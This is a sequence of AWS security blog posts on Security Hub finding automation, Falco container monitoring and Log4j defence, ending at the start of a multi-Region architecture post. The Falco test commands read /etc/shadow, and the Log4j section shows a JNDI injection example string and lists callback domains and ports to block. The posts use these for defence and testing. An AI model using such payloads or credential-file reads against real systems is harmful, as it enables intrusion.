Security Hub provides a comprehensive view of your security alerts and security posture across your AWS accounts. Security Hub provides a single place that aggregates, organizes, and prioritizes your security alerts (also called findings) from multiple AWS services and partner solutions. Security Hub lets you assign workflow statuses of NEW, NOTIFIED, SUPPRESSED, or RESOLVED to findings. These statuses help you understand the state of your security findings and identify which need attention. As AWS resources are spun up and down during the course of normal business activities, there might be findings in Security Hub for those resources. AWS Security Hub findings backed by AWS Config are automatically archived when AWS Config identifies that a resource has been deleted. However, for some AWS service integrations—such as Amazon GuardDuty and third-party partner products—findings aren’t automatically resolved or archived when a resource is deleted. This can result in orphaned findings for resources that no longer exist.

In this post, we show you how to use an event-driven architecture to automatically resolve findings for all providers—AWS and third-party—for resources that have been deleted. Automatically resolving these findings reduces alert fatigue by decreasing noise, allowing your security team to focus on investigating and remediating high fidelity findings.

A common use case for automatically resolving findings is for Amazon Elastic Compute Cloud (Amazon EC2) instances that are ephemeral in nature. For example, Amazon EC2 instances that are part of an Amazon EC2 Auto Scaling group. EC2 instances can scale to thousands of nodes multiple times a day depending on the workload. Without automatically resolving these findings, you could end up with one or more findings for each instance. By automatically resolving findings for the deleted resources, your teams can focus on investigating and remediating findings that affect active resources.

Prerequisites

This solution assumes that you have Security Hub and AWS Config configured across all of your AWS accounts. Instructions for configuring Security Hub and its dependencies can be found in the Security Hub user guide. Ensure you have configured Security Hub to use a delegated administrator account, which centralizes findings from all member accounts.

Solution overview

In Security Hub, the investigation status of a finding is tracked using the workflow status attribute. The workflow status attribute for new findings is initially set to NEW. You can change the workflow status of a finding by either selecting it in the AWS Security Hub console, or by automating the change of workflow status by using the AWS Command Line Interface (AWS CLI) or Security Hub SDKs. The usual workflow for a finding, whether managed manually or through automation, is NEW, NOTIFIED, then RESOLVED or SUPPRESSED.

In this solution, we show you how to automatically set the workflow status to RESOLVED for all applicable findings when an EC2 instance, Amazon Simple Storage Service (Amazon S3) bucket, or an AWS Identity and Access Management (IAM) role is deleted. This event-driven solution uses Amazon EventBridge event patterns—which can be easily customized to meet your specific business needs—to invoke the resolution workflow on Delete or Terminate API calls. An EventBridge event bus is used to forward all Delete or Terminate API calls to your Security Hub delegated administrator account. Event patterns are used to filter for specific events and forward them to a target. With this solution, you filter for specific Delete and Terminate events, identified by the event name. The target for matching events is an AWS Lambda function. The invocation of this function includes context around the event which includes the metadata for the resource that was just deleted or terminated. This function queries the Security Hub GetFindings API for all findings for the resource with a status of NEW or NOTIFIED. The function then sets the workflow status to RESOLVED for all findings for the Amazon Resource Name (ARN) of the given resource by calling the BatchUpdateFindings Security Hub API.

Solution architecture

Figure 1: Solution architecture overview

Figure 1: Solution architecture overview

Figure 1 shows the deletion of an AWS resource in a Security Hub member account being forwarded to the EventBridge event bus in the Security Hub administrator account. The process flow is as follows:

  1. In a Security Hub member account, a user deletes or terminates a resource through the AWS Management Console, AWS CLI, or SDK.
  2. AWS CloudTrail logs the user activity and automatically forwards an event to EventBridge.
  3. An EventBridge event pattern filters for the delete or terminate API call, and generates an event.
  4. The event is forwarded to the event bus in the Security Hub administrator account.
  5. In the Security Hub administrator account, an event pattern is used to filter for all delete or terminate API calls.
  6. Matching events generate an EventBridge event.
  7. The target for this event is the Lambda function to resolve Security Hub findings for the recently deleted resource.
  8. The Lambda function generates a list of all findings for the recently deleted resource and updates the workflow status for each finding to RESOLVED in the Security Hub delegated administrator account.
  9. The workflow status propagates from the Security Hub delegated administrator account to the member accounts of Security Hub.

To deploy the solution

In the Security Hub administrator account complete the following steps:

  1. In the following resource policy, replace <Region> with the AWS Region where the solution is deployed, <AccountID> with the Security Hub administrator account ID and <OrgID> is the ID of the organization within your AWS Organizations implementation.
    {
      "Version": "2012-10-17",
      "Statement": [{
        "Sid": "allow_all_accounts_from_organization_to_put_events",
        "Effect": "Allow",
        "Principal": "*",
        "Action": "events:PutEvents",
        "Resource": "arn:aws:events:<Region>:<AccountID>:event-bus/default",
        "Condition": {
          "StringEquals": {
            "aws:PrincipalOrgID": "<OrgID>"
          }
        }
      }]
    }
    

  2. Add the edited resource policy to the default EventBridge event bus to allow all accounts in your organization to send delete events for IAM roles, EC2 instances, and S3 buckets to the default event bus in the Security Hub administrator account.

    Note: You can also choose to specify a list of accounts to receive events from. For more information about configuring a resource policy see Managing event bus permissions in Permissions for Amazon EventBridge event buses.

  3. Deploy the AWS CloudFormation template that creates the required resources.

    Launch Stack Button

In each Security Hub member account, deploy the CloudFormation template. You will need to specify the Security Hub administrator AWS account ID to deploy the stack.

Launch Stack Button

Tip: CloudFormation StackSets can be used to deploy stacks across all accounts in your organization. For more information, see Working with AWS CloudFormation StackSets.

Note: With CloudFormation StackSets, the template isn’t deployed in the StackSet administrator account by default. The CloudFormation stack must be deployed separately in the StackSet administrator account.

Note: Security Hub now supports cross-Region aggregation of findings. If you have Security Hub cross-Region aggregation enabled. The solution in this post will work for findings in all aggregated regions.

Next steps

Understanding and fixing the root cause for Security Hub findings will improve your security posture and reduce the number of future findings. As a best practice, you should periodically analyze the findings for resources that have been automatically resolved by this solution to identify trends so that your team can investigate and fix root causes. You can use the filter below in the Security Hub console to view all findings automatically resolved by this solution:

To analyze findings

  1. Open the Security Hub console and select Findings.
  2. Check to see that Workflow status is RESOLVED and Note updated by is DeletedResourceFindingResolver.
  3. (Optional) You can also create a custom insight for these findings by adding Group by: ProductName to the filter.
  4. Select Create Insight as shown in Figure 2.
Figure 2: AWS Security Hub

Figure 2: AWS Security Hub

Note: You can expand the solution to include other resource types based on your requirements, such as security groups, Amazon Relational Database Service (Amazon RDS) databases, and IAM users by updating the event pattern in the EventBridge rule and modifying the Lambda function code.

Conclusion

In this post, we showed how you can automatically resolve findings for deleted EC2, IAM and S3 resources by using the Security Hub GetFindings and BatchUpdateFindings API actions. We showed you how to configure EventBridge patterns and rules to initiate a Lambda function through a centralized event bus to address these findings for resources across your Organizations.

If you have feedback about this post, submit comments in the Comments section below. If you have questions about this post, start a new thread on the Security Hub forum. To start your 30-day free trial of Security Hub, visit AWS Security Hub.

Want more AWS Security how-to content, news, and feature announcements? Follow us on Twitter.

Author

Kris Normand

Kris is a Senior Security Consultant with AWS Professional Services. He partners with Chief Information Security Officers to lead their digital transformation efforts on AWS. When not working on security and compliance initiatives with customers, Kris enjoys traveling, hiking, and spending time with his family. He is also a veteran of the U.S Air Force.

Author

Cory Smith

Cory is a Senior Security Consultant with AWS Professional Services based in San Antonio, TX. He partners with customers to deliver key business outcomes in a secure and compliant manner within AWS. He’s passionate about solving complex technical problems with new and innovative solutions.

Author

Kafayat Adeyemi

Kafayat is a Senior Technical Account Manager at AWS based in Atlanta, GA. She is passionate about security and works with enterprise customers to build, deploy, and manage secure and scalable workloads on AWS. Outside of work, she loves to travel, bake, and spend time with her family.

Author

Justin Kontny

Justin is a Senior Security Consultant with the AWS Global Security Practice, a part of our Worldwide Professional Services Organization. He helps customers improve their security posture as they migrate their most sensitive workloads to AWS. Justin has a passion for detective controls and scaling security via automation.

Continuous runtime security monitoring with AWS Security Hub and Falco

Post Syndicated from Rajarshi Das original https://aws.amazon.com/blogs/security/continuous-runtime-security-monitoring-with-aws-security-hub-and-falco/

Customers want a single and comprehensive view of the security posture of their workloads. Runtime security event monitoring is important to building secure, operationally excellent, and reliable workloads, especially in environments that run containers and container orchestration platforms. In this blog post, we show you how to use services such as AWS Security Hub and Falco, a Cloud Native Computing Foundation project, to build a continuous runtime security monitoring solution.

With the solution in place, you can collect runtime security findings from multiple AWS accounts running one or more workloads on AWS container orchestration platforms, such as Amazon Elastic Kubernetes Service (Amazon EKS) or Amazon Elastic Container Service (Amazon ECS). The solution collates the findings across those accounts into a designated account where you can view the security posture across accounts and workloads.

 

Solution overview

Security Hub collects security findings from other AWS services using a standardized AWS Security Findings Format (ASFF). Falco provides the ability to detect security events at runtime for containers. Partner integrations like Falco are also available on Security Hub and use ASFF. Security Hub provides a custom integrations feature using ASFF to enable collection and aggregation of findings that are generated by custom security products.

The solution in this blog post uses AWS FireLens, Amazon CloudWatch Logs, and AWS Lambda to enrich logs from Falco and populate Security Hub.

Figure : Architecture diagram of continuous runtime security monitoring

Figure 1: Architecture diagram of continuous runtime security monitoring

Here’s how the solution works, as shown in Figure 1:

  1. An AWS account is running a workload on Amazon EKS.
    1. Runtime security events detected by Falco for that workload are sent to CloudWatch logs using AWS FireLens.
    2. CloudWatch logs act as the source for FireLens and a trigger for the Lambda function in the next step.
    3. The Lambda function transforms the logs into the ASFF. These findings can now be imported into Security Hub.
    4. The Security Hub instance that is running in the same account as the workload running on Amazon EKS stores and processes the findings provided by Lambda and provides the security posture to users of the account. This instance also acts as a member account for Security Hub.
  2. Another AWS account is running a workload on Amazon ECS.
    1. Runtime security events detected by Falco for that workload are sent to CloudWatch logs using AWS FireLens.
    2. CloudWatch logs acts as the source for FireLens and a trigger for the Lambda function in the next step.
    3. The Lambda function transforms the logs into the ASFF. These findings can now be imported into Security Hub.
    4. The Security Hub instance that is running in the same account as the workload running on Amazon ECS stores and processes the findings provided by Lambda and provides the security posture to users of the account. This instance also acts as another member account for Security Hub.
  3. The designated Security Hub administrator account combines the findings generated by the two member accounts, and then provides a comprehensive view of security alerts and security posture across AWS accounts. If your workloads span multiple regions, Security Hub supports aggregating findings across Regions.

 

Prerequisites

For this walkthrough, you should have the following in place:

  1. Three AWS accounts.

    Note: We recommend three accounts so you can experience Security Hub’s support for a multi-account setup. However, you can use a single AWS account instead to host the Amazon ECS and Amazon EKS workloads, and send findings to Security Hub in the same account. If you are using a single account, skip the following account specific-guidance. If you are integrated with AWS Organizations, the designated Security Hub administrator account will automatically have access to the member accounts.

  2. Security Hub set up with an administrator account on one account.
  3. Security Hub set up with member accounts on two accounts: one account to host the Amazon EKS workload, and one account to host the Amazon ECS workload.
  4. Falco set up on the Amazon EKS and Amazon ECS clusters, with logs routed to CloudWatch Logs using FireLens. For instructions on how to do this, see:

    Important: Take note of the names of the CloudWatch Logs groups, as you will need them in the next section.

  5. AWS Cloud Development Kit (CDK) installed on the member accounts to deploy the solution that provides the custom integration between Falco and Security Hub.

 

Deploying the solution

In this section, you will learn how to deploy the solution and enable the CloudWatch Logs group. Enabling the CloudWatch Logs group is the trigger for running the Lambda function in both member accounts.

To deploy this solution in your own account

  1. Clone the aws-securityhub-falco-ecs-eks-integration GitHub repository by running the following command.
    $git clone https://github.com/aws-samples/aws-securityhub-falco-ecs-eks-integration
  2. Follow the instructions in the README file provided on GitHub to build and deploy the solution. Make sure that you deploy the solution to the accounts hosting the Amazon EKS and Amazon ECS clusters.
  3. Navigate to the AWS Lambda console and confirm that you see the newly created Lambda function. You will use this function in the next section.
Figure : Lambda function for Falco integration with Security Hub

Figure 2: Lambda function for Falco integration with Security Hub

To enable the CloudWatch Logs group

  1. In the AWS Management Console, select the Lambda function shown in Figure 2—AwsSecurityhubFalcoEcsEksln-lambdafunction—and then, on the Function overview screen, select + Add trigger.
  2. On the Add trigger screen, provide the following information and then select Add, as shown in Figure 3.
    • Trigger configuration – From the drop-down, select CloudWatch logs.
    • Log group – Choose the Log group you noted in Step 4 of the Prerequisites. In our setup, the log group for the Amazon ECS and Amazon EKS clusters, deployed in separate AWS accounts, was set with the same value (falco).
    • Filter name – Provide a name for the filter. In our example, we used the name falco.
    • Filter pattern – optional – Leave this field blank.
    Figure 3: Lambda function trigger - CloudWatch Log group

    Figure 3: Lambda function trigger – CloudWatch Log group

  3. Repeat these steps (as applicable) to set up the trigger for the Lambda function deployed in other accounts.

 

Testing the deployment

Now that you’ve deployed the solution, you will verify that it’s working.

With the default rules, Falco generates alerts for activities such as:

  • An attempt to write to a file below the /etc folder. The /etc folder contains important system configuration files.
  • An attempt to open a sensitive file (such as /etc/shadow) for reading.

To test your deployment, you will attempt to perform these activities to generate Falco alerts that are reported as Security Hub findings in the same account. Then you will review the findings.

To test the deployment in member account 1

  1. Run the following commands to trigger an alert in member account 1, which is running an Amazon EKS cluster. Replace <container_name> with your own value.
    kubectl exec -it <container_name> /bin/bash
    touch /etc/5
    cat /etc/shadow > /dev/null
  2. To see the list of findings, log in to your Security Hub admin account and navigate to Security Hub > Findings. As shown in Figure 4, you will see the alerts generated by Falco, including the Falco-generated title, and the instance where the alert was triggered.

    Figure 4: Findings in Security Hub

    Figure 4: Findings in Security Hub

  3. To see more detail about a finding, check the box next to the finding. Figure 5 shows some of the details for the finding Read sensitive file untrusted.
    Figure 5: Sensitive file read finding - detail view

    Figure 5: Sensitive file read finding – detail view

    Figure 6 shows the Resources section of this finding, that includes the instance ID of the Amazon EKS cluster node. In our example this is the Amazon Elastic Compute Cloud (Amazon EC2) instance.

    Figure 6: Resource Detail in Security Hub finding

To test the deployment in member account 2

  1. Run the following commands to trigger a Falco alert in member account 2, which is running an Amazon ECS cluster. Replace <<container_id> with your own value.
    docker exec -it <container_id> bash
    touch /etc/5
    cat /etc/shadow > /dev/null
  2. As in the preceding example with member account 1, to view the findings related to this alert, navigate to your Security Hub admin account and select Findings.

To view the collated findings from both member accounts in Security Hub

  1. In the designated Security Hub administrator account, navigate to Security Hub > Findings. The findings from both member accounts are collated in the designated Security Hub administrator account. You can use this centralized account to view the security posture across accounts and workloads. Figure 7 shows two findings, one from each member account, viewable in the Single Pane of Glass administrator account.

    Figure 7: Write below /etc findings in a single view

    Figure 7: Write below /etc findings in a single view

  2. To see more information and a link to the corresponding member account where the finding was generated, check the box next to the finding. Figure 8 shows the account detail associated with a specific finding in member account 1.
    Figure 8: Write under /etc detail view in Security Hub admin account

    Figure 8: Write under /etc detail view in Security Hub admin account

    By centralizing and enriching the findings from Falco, you can take action more quickly or perform automated remediation on the impacted resources.

 

Cleaning up

To clean up this demo:

  1. Delete the CloudWatch Logs trigger from the Lambda functions that were created in the section To enable the CloudWatch Logs group.
  2. Delete the Lambda functions by deleting the CloudFormation stack, created in the section To deploy this solution in your own account.
  3. Delete the Amazon EKS and Amazon ECS clusters created as part of the Prerequisites.

 

Conclusion

In this post, you learned how to achieve multi-account continuous runtime security monitoring for container-based workloads running on Amazon EKS and Amazon ECS. This is achieved by creating a custom integration between Falco and Security Hub.

You can extend this solution in a number of ways. For example:

  • You can forward findings across accounts using a single source to security information and event management (SIEM) tools such as Splunk.
  • You can perform automated remediation activities based on the findings generated, using Lambda.

To learn more about managing a centralized Security Hub administrator account, see Managing administrator and member accounts. To learn more about working with ASFF, see AWS Security Finding Format (ASFF) in the documentation. To learn more about the Falco engine and rule structure, see the Falco documentation.

If you have feedback about this post, submit comments in the Comments section below.

Want more AWS Security news? Follow us on Twitter.

Rajarshi Das

Rajarshi Das

Rajarshi is a Solutions Architect at Amazon Web Services. He focuses on helping Public Sector customers accelerate their security and compliance certifications and authorizations by architecting secure and scalable solutions. Rajarshi holds 4 AWS certifications including AWS Certified Solutions Architect – Professional and AWS Certified Security – Specialist.

Author

Adam Cerini

Adam is a Senior Solutions Architect with Amazon Web Services. He focuses on helping Public Sector customers architect scalable, secure, and cost effective systems. Adam holds 5 AWS certifications including AWS Certified Solutions Architect – Professional and AWS Certified Security – Specialist.

Using AWS security services to protect against, detect, and respond to the Log4j vulnerability

Post Syndicated from Marshall Jones original https://aws.amazon.com/blogs/security/using-aws-security-services-to-protect-against-detect-and-respond-to-the-log4j-vulnerability/

January 7, 2022: The blog post has been updated to include using Network ACL rules to block potential log4j-related outbound traffic.

January 4, 2022: The blog post has been updated to suggest using WAF rules when correct HTTP Host Header FQDN value is not provided in the request.

December 31, 2021: We made a minor update to the second paragraph in the Amazon Route 53 Resolver DNS Firewall section.

December 29, 2021: A paragraph under the Detect section has been added to provide guidance on validating if log4j exists in an environment.

December 23, 2021: The GuardDuty section has been updated to describe new threat labels added to specific finding to give log4j context.

December 21, 2021: The post includes more info about Route 53 Resolver DNS query logging.

December 20, 2021: The post has been updated to include Amazon Route 53 Resolver DNS Firewall info.

December 17, 2021: The post has been updated to include using Athena to query VPC flow logs.

December 16, 2021: The Respond section of the post has been updated to include IMDSv2 and container mitigation info.

This blog post was first published on December 15, 2021.


Overview

In this post we will provide guidance to help customers who are responding to the recently disclosed log4j vulnerability. This covers what you can do to limit the risk of the vulnerability, how you can try to identify if you are susceptible to the issue, and then what you can do to update your infrastructure with the appropriate patches.

The log4j vulnerability (CVE-2021-44228, CVE-2021-45046) is a critical vulnerability (CVSS 3.1 base score of 10.0) in the ubiquitous logging platform Apache Log4j. This vulnerability allows an attacker to perform a remote code execution on the vulnerable platform. Version 2 of log4j, between versions 2.0-beta-9 and 2.15.0, is affected.

The vulnerability uses the Java Naming and Directory Interface (JNDI) which is used by a Java program to find data, typically through a directory, commonly a LDAP directory in the case of this vulnerability.

Figure 1, below, highlights the log4j JNDI attack flow.

Figure 1. Log4j attack progression

Figure 1. Log4j attack progression. Source: GovCERT.ch, the Computer Emergency Response Team (GovCERT) of the Swiss government

As an immediate response, follow this blog and use the tool designed to hotpatch a running JVM using any log4j 2.0+. Steve Schmidt, Chief Information Security Officer for AWS, also discussed this hotpatch.

Protect

You can use multiple AWS services to help limit your risk/exposure from the log4j vulnerability. You can build a layered control approach, and/or pick and choose the controls identified below to help limit your exposure.

AWS WAF

Use AWS Web Application Firewall, following AWS Managed Rules for AWS WAF, to help protect your Amazon CloudFront distribution, Amazon API Gateway REST API, Application Load Balancer, or AWS AppSync GraphQL API resources.

  • AWSManagedRulesKnownBadInputsRuleSet esp. the Log4JRCE rule which helps inspects the request for the presence of the Log4j vulnerability. Example patterns include ${jndi:ldap://example.com/}.
  • AWSManagedRulesAnonymousIpList esp. the AnonymousIPList rule which helps inspect IP addresses of sources known to anonymize client information.
  • AWSManagedRulesCommonRuleSet, esp. the SizeRestrictions_BODY rule to verify that the request body size is at most 8 KB (8,192 bytes).

You should also consider implementing WAF rules that deny access, if the correct HTTP Host Header FQDN value is not provided in the request. This can help reduce the likelihood of scanners that are scanning the internet IP address space from reaching your resources protected by WAF via a request with an incorrect Host Header, like an IP address instead of an FQDN. It’s also possible to use custom Application Load Balancer listener rules to achieve this.

If you’re using AWS WAF Classic, you will need to migrate to AWS WAF or create custom regex match conditions.

Have multiple accounts? Follow these instructions to use AWS Firewall Manager to deploy AWS WAF rules centrally across your AWS organization.

Amazon Route 53 Resolver DNS Firewall

You can use Route 53 Resolver DNS Firewall, following AWS Managed Domain Lists, to help proactively protect resources with outbound public DNS resolution. We recommend associating Route 53 Resolver DNS Firewall with a rule configured to block domains on the AWSManagedDomainsMalwareDomainList, which has been updated in all supported AWS regions with domains identified as hosting malware used in conjunction with the log4j vulnerability. AWS will continue to deliver domain updates for Route 53 Resolver DNS Firewall through this list.

Also, you should consider blocking outbound port 53 to prevent the use of external untrusted DNS servers. This helps force all DNS queries through DNS Firewall and ensures DNS traffic is visible for GuardDuty inspection. Using DNS Firewall to block DNS resolution of certain country code top-level domains (ccTLD) that your VPC resources have no legitimate reason to connect out to, may also help. Examples of ccTLDs you may want to block may be included in the known log4j callback domains IOCs.

We also recommend that you enable DNS query logging, which allows you to identify and audit potentially impacted resources within your VPC, by inspecting the DNS logs for the presence of blocked outbound queries due to the log4j vulnerability, or to other known malicious destinations. DNS query logging is also useful in helping identify EC2 instances vulnerable to log4j that are responding to active log4j scans, which may be originating from malicious actors or from legitimate security researchers. In either case, instances responding to these scans potentially have the log4j vulnerability and should be addressed. GreyNoise is monitoring for log4j scans and sharing the callback domains here. Some notable domains customers may want to examine log activity for, but not necessarily block, are: *interact.sh, *leakix.net, *canarytokens.com, *dnslog.cn, *.dnsbin.net, and *cyberwar.nl. It is very likely that instances resolving these domains are vulnerable to log4j.

AWS Network Firewall

Customers can use Suricata-compatible IDS/IPS rules in AWS Network Firewall to deploy network-based detection and protection. While Suricata doesn’t have a protocol detector for LDAP, it is possible to detect these LDAP calls with Suricata. Open-source Suricata rules addressing Log4j are available from corelight, NCC Group, from ET Labs, and from CrowdStrike. These rules can help identify scanning, as well as post exploitation of the log4j vulnerability. Because there is a large amount of benign scanning happening now, we recommend customers focus their time first on potential post-exploitation activities, such as outbound LDAP traffic from their VPC to untrusted internet destinations.

We also recommend customers consider implementing outbound port/protocol enforcement rules that monitor or prevent instances of protocols like LDAP from using non-standard LDAP ports such as 53, 80, 123, and 443. Monitoring or preventing usage of port 1389 outbound may be particularly helpful in identifying systems that have been triggered by internet scanners to make command and control calls outbound. We also recommend that systems without a legitimate business need to initiate network calls out to the internet not be given that ability by default. Outbound network traffic filtering and monitoring is not only very helpful with log4j, but with identifying other classes of vulnerabilities too.

Network Access Control Lists

Customers may be able to use Network Access Control List rules (NACLs) to block some of the known log4j-related outbound ports to help limit further compromise of successfully exploited systems. We recommend customers consider blocking ports 1389, 1388, 1234, 12344, 9999, 8085, 1343 outbound. As NACLs block traffic at the subnet level, careful consideration should be given to ensure any new rules do not block legitimate communications using these outbound ports across internal subnets. Blocking ports 389 and 88 outbound can also be helpful in mitigating log4j, but those ports are commonly used for legitimate applications, especially in a Windows Active Directory environment. See the VPC flow logs section below to get details on how you can validate any ports being considered.

Use IMDSv2

Through the early days of the log4j vulnerability researchers have noted that, once a host has been compromised with the initial JDNI vulnerability, attackers sometimes try to harvest credentials from the host and send those out via some mechanism such as LDAP, HTTP, or DNS lookups. We recommend customers use IAM roles instead of long-term access keys, and not store sensitive information such as credentials in environment variables. Customers can also leverage AWS Secrets Manager to store and automatically rotate database credentials instead of storing long-term database credentials in a host’s environment variables. See prescriptive guidance here and here on how to implement Secrets Manager in your environment.

To help guard against such attacks in AWS when EC2 Roles may be in use — and to help keep all IMDS data private for that matter — customers should consider requiring the use of Instance MetaData Service version 2 (IMDSv2). Since IMDSv2 is enabled by default, you can require its use by disabling IMDSv1 (which is also enabled by default). With IMDSv2, requests are protected by an initial interaction in which the calling process must first obtain a session token with an HTTP PUT, and subsequent requests must contain the token in an HTTP header. This makes it much more difficult for attackers to harvest credentials or any other data from the IMDS. For more information about using IMDSv2, please refer to this blog and documentation. While all recent AWS SDKs and tools support IMDSv2, as with any potentially non-backwards compatible change, test this change on representative systems before deploying it broadly.

Detect

This post has covered how to potentially limit the ability to exploit this vulnerability. Next, we’ll shift our focus to which AWS services can help to detect whether this vulnerability exists in your environment.

Figure 2. Log4j finding in the Inspector console

Figure 2. Log4j finding in the Inspector console

Amazon Inspector

As shown in Figure 2, the Amazon Inspector team has created coverage for identifying the existence of this vulnerability in your Amazon EC2 instances and Amazon Elastic Container Registry Images (Amazon ECR). With the new Amazon Inspector, scanning is automated and continual. Continual scanning is driven by events such as new software packages, new instances, and new common vulnerability and exposure (CVEs) being published.

For example, once the Inspector team added support for the log4j vulnerability (CVE-2021-44228 & CVE-2021-45046), Inspector immediately began looking for this vulnerability for all supported AWS Systems Manager managed instances where Log4j was installed via OS package managers and where this package was present in Maven-compatible Amazon ECR container images. If this vulnerability is present, findings will begin appearing without any manual action. If you are using Inspector Classic, you will need to ensure you are running an assessment against all of your Amazon EC2 instances. You can follow this documentation to ensure you are creating an assessment target for all of your Amazon EC2 instances. Here are further details on container scanning updates in Amazon ECR private registries.

GuardDuty

In addition to finding the presence of this vulnerability through Inspector, the Amazon GuardDuty team has also begun adding indicators of compromise associated with exploiting the Log4j vulnerability, and will continue to do so. GuardDuty will monitor for attempts to reach known-bad IP addresses or DNS entries, and can also find post-exploit activity through anomaly-based behavioral findings. For example, if an Amazon EC2 instance starts communicating on unusual ports, GuardDuty would detect this activity and create the finding Behavior:EC2/NetworkPortUnusual. This activity is not limited to the NetworkPortUnusual finding, though. GuardDuty has a number of different findings associated with post exploit activity, such as credential compromise, that might be seen in response to a compromised AWS resource. For a list of GuardDuty findings, please refer to this GuardDuty documentation.

To further help you identify and prioritize issues related to CVE-2021-44228 and CVE-2021-45046, the GuardDuty team has added threat labels to the finding detail for the following finding types:

Backdoor:EC2/C&CActivity.B
If the IP queried is Log4j-related, then fields of the associated finding will include the following values:

  • service.additionalInfo.threatListName = Amazon
  • service.additionalInfo.threatName = Log4j Related

Backdoor:EC2/C&CActivity.B!DNS
If the domain name queried is Log4j-related, then the fields of the associated finding will include the following values:

  • service.additionalInfo.threatListName = Amazon
  • service.additionalInfo.threatName = Log4j Related

Behavior:EC2/NetworkPortUnusual
If the EC2 instance communicated on port 389 or port 1389, then the associated finding severity will be modified to High, and the finding fields will include the following value:

  • service.additionalInfo.context = Possible Log4j callback
Figure 3. GuardDuty finding with log4j threat labels

Figure 3. GuardDuty finding with log4j threat labels

Security Hub

Many customers today also use AWS Security Hub with Inspector and GuardDuty to aggregate alerts and enable automatic remediation and response. In the short term, we recommend that you use Security Hub to set up alerting through AWS Chatbot, Amazon Simple Notification Service, or a ticketing system for visibility when Inspector finds this vulnerability in your environment. In the long term, we recommend you use Security Hub to enable automatic remediation and response for security alerts when appropriate. Here are ideas on how to setup automatic remediation and response with Security Hub.

VPC flow logs

Customers can use Athena or CloudWatch Logs Insights queries against their VPC flow logs to help identify VPC resources associated with log4j post exploitation outbound network activity. Version 5 of VPC flow logs is particularly useful, because it includes the “flow-direction” field. We recommend customers start by paying special attention to outbound network calls using destination port 1389 since outbound usage of that port is less common in legitimate applications. Customers should also investigate outbound network calls using destination ports 1388, 1234, 12344, 9999, 8085, 1343, 389, and 88 to untrusted internet destination IP addresses. Free-tier IP reputation services, such as VirusTotal, GreyNoise, NOC.org, and ipinfo.io, can provide helpful insights related to public IP addresses found in the logged activity.

Note: If you have a Microsoft Active Directory environment in the captured VPC flow logs being queried, you might see false positives due to its use of port 389.

Validation with open-source tools

With the evolving nature of the different log4j vulnerabilities, it’s important to validate that upgrades, patches, and mitigations in your environment are indeed working to mitigate potential exploitation of the log4j vulnerability. You can use open-source tools, such as aws_public_ips, to get a list of all your current public IP addresses for an AWS Account, and then actively scan those IPs with log4j-scan using a DNS Canary Token to get notification of which systems still have the log4j vulnerability and can be exploited. We recommend that you run this scan periodically over the next few weeks to validate that any mitigations are still in place, and no new systems are vulnerable to the log4j issue.

Respond

The first two sections have discussed ways to help prevent potential exploitation attempts, and how to detect the presence of the vulnerability and potential exploitation attempts. In this section, we will focus on steps that you can take to mitigate this vulnerability. As we noted in the overview, the immediate response recommended is to follow this blog and use the tool designed to hotpatch a running JVM using any log4j 2.0+. Steve Schmidt, Chief Information Security Officer for AWS, also discussed this hotpatch.

Figure 4. Systems Manager Patch Manager patch baseline approving critical patches immediately

Figure 4. Systems Manager Patch Manager patch baseline approving critical patches immediately

AWS Patch Manager

If you use AWS Systems Manager Patch Manager, and you have critical patches set to install immediately in your patch baseline, your EC2 instances will already have the patch. It is important to note that you’re not done at this point. Next, you will need to update the class path wherever the library is used in your application code, to ensure you are using the most up-to-date version. You can use AWS Patch Manager to patch managed nodes in a hybrid environment. See here for further implementation details.

Container mitigation

To install the hotpatch noted in the overview onto EKS cluster worker nodes AWS has developed an RPM that performs a JVM-level hotpatch which disables JNDI lookups from the log4j2 library. The Apache Log4j2 node agent is an open-source project built by the Kubernetes team at AWS. To learn more about how to install this node agent, please visit the this Github page.

Once identified, ECR container images will need to be updated to use the patched log4j version. Downstream, you will need to ensure that any containers built with a vulnerable ECR container image are updated to use the new image as soon as possible. This can vary depending on the service you are using to deploy these images. For example, if you are using Amazon Elastic Container Service (Amazon ECS), you might want to update the service to force a new deployment, which will pull down the image using the new log4j version. Check the documentation that supports the method you use to deploy containers.

If you’re running Java-based applications on Windows containers, follow Microsoft’s guidance here.

We recommend you vend new application credentials and revoke existing credentials immediately after patching.

Mitigation strategies if you can’t upgrade

In case you either can’t upgrade to a patched version, which disables access to JDNI by default, or if you are still determining your strategy for how you are going to patch your environment, you can mitigate this vulnerability by changing your log4j configuration. To implement this mitigation in releases >=2.10, you will need to remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class.

For a more comprehensive list about mitigation steps for specific versions, refer to the Apache website.

Conclusion

In this blog post, we outlined key AWS security services that enable you to adopt a layered approach to help protect against, detect, and respond to your risk from the log4j vulnerability. We urge you to continue to monitor our security bulletins; we will continue updating our bulletins with our remediation efforts for our side of the shared-responsibility model.

Given the criticality of this vulnerability, we urge you to pay close attention to the vulnerability, and appropriately prioritize implementing the controls highlighted in this blog.

If you have feedback about this post, submit comments in the Comments section below.

Want more AWS Security news? Follow us on Twitter.

Marshall Jones

Marshall is a Worldwide Security Specialist Solutions Architect at AWS. His background is in AWS consulting and security architecture, focused on a variety of security domains including edge, threat detection, and compliance. Today, he is focused on helping enterprise AWS customers adopt and operationalize AWS security services to increase security effectiveness and reduce risk.

Syed Shareef

Syed is a Senior Security Solutions Architect at AWS. He works with large financial institutions to help them achieve their business goals with AWS, whilst being compliant with regulatory and security requirements.

Creating a Multi-Region Application with AWS Services – Part 1, Compute and Security

Post Syndicated from Joe Chapman original https://aws.amazon.com/blogs/architecture/creating-a-multi-region-application-with-aws-services-part-1-compute-and-security/

Building a multi-Region application requires lots of preparation and work. Many AWS services have features to help you build and manage a multi-Region architecture, but identifying those capabilities across 200+ services can be overwhelming.

In this 3-part blog series, we’ll explore AWS services with features to assist you in building multi-Region applications. In Part 1, we’ll build a foundation with AWS security, networking, and compute services. In Part 2, we’ll add in data and replication strategies. Finally, in Part 3, we’ll look at the application and management layers.

Considerations before getting started

AWS Regions are built with multiple isolated and physically separate Availability Zones (AZs). This approach allows you to create highly available Well-Architected workloads that span AZs to achieve greater fault tolerance. There are three general reasons that you may need to expand beyond a single Region:

  • Expansion to a global audience as an application grows and its user base becomes more geographically dispersed, there can be a need to reduce latencies for different parts of the world.
  • Reducing Recovery Point Objectives (RPO) and Recovery Time Objectives (RTO) as part of disaster recovery (DR) plan.
  • Local laws and regulations may have strict data residency and privacy requirements that must be followed.

Ensuring security, identity, and compliance

